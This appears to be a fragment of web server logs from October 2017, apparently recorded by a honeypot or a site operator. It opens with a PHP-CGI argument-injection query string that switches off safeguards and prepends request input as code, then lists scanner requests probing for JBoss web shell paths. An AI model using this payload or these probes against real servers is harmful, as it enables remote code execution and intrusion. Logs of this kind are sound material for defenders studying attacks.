cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n


[29/Oct/2017 03:04:56]



81.196.44.23







89.248.172.237 - - [31/Oct/2017:06:26:42 +0000] "GET //jexws4/jexws4.jsp HTTP/1.1" 404 209 "-" "python-requests/2.18.4"
89.248.172.237 - - [31/Oct/2017:06:26:42 +0000] "GET //jexinv4/jexinv4.jsp HTTP/1.1" 404 209 "-" "python-requests/2.18.4"
89.248.172.237 - - [31/Oct/2017:06:26:43 +0000] "GET //jbossass/jbossass.jsp HTTP/1.1" 404 209 "-" "python-requests/2.18.4"
89.248.172.237 - - [31/Oct/2017:06:26:43 +0000] "GET //shellinvoker/shellinvoker.jsp HTTP/1.1" 404 209 "-" "python-requests/2.18.4"
